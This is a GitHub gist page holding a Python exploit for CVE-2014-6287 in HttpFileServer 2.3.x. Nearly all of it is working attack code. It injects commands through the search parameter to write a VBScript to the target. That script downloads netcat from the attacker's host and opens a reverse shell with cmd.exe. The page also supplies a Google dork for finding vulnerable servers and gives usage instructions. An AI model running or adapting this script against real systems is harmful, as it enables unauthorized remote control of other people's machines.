Forked from AfroThundr3007730/cve-2014-6287.py
Last active
November 23, 2020 03:32
-
-
Save darkniyt/66266a85af5f952bc81e002dff368415 to your computer and use it in GitHub Desktop.
Modified version of CVE-2014-6287 python script found here: https://www.exploit-db.com/exploits/39161/
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution | |
# Google Dork: intext:"httpfileserver 2.3" | |
# Date: 04-01-2016 | |
# Remote: Yes | |
# Exploit Author: Avinash Kumar Thapa aka "-Acid" | |
# Vendor Homepage: http://rejetto.com/ | |
# Software Link: http://sourceforge.net/projects/hfs/ | |
# Version: 2.3.x | |
# Tested on: Windows Server 2008 , Windows 8, Windows 7 | |
# CVE : CVE-2014-6287 | |
# Description: You can use HFS (HTTP File Server) to send and receive files. | |
# It's different from classic file sharing because it uses web technology to be more compatible with today's Internet. | |
# It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux. | |
#Modification: collapse in to 2 methods rolling webshell in to script.vbs | |
#Usage : python Exploit.py <Target IP address> <Target Port Number> | |
#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe). | |
# You may need to run it multiple times for success! | |
import urllib2 | |
import sys | |
try: | |
def script_create(): | |
urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}") | |
def execute_script(): | |
urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}") | |
ip_addr = "10.6.26.69" #local IP address | |
local_port = "4040" # Local Port number | |
vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F" + ip_addr + "%2Fnc64.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with%0D%0ASet%20objShell%20%3D%20CreateObject(%22WScript.Shell%22)%0D%0AobjShell.Exec(%22C%3A%5CUsers%5CPublic%5Cnc.exe%20-d%20" + ip_addr + "%20" +local_port+ "%20-e%20cmd.exe%22)" | |
save= "save|" + vbs | |
vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs" | |
exe= "exec|"+vbs2 | |
script_create() | |
execute_script() | |
except: | |
print """[.]Something went wrong..! | |
Usage is :[.] python exploit.py <Target IP address> <Target Port Number> | |
Don't forgot to change the Local IP address and Port number on the script""" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment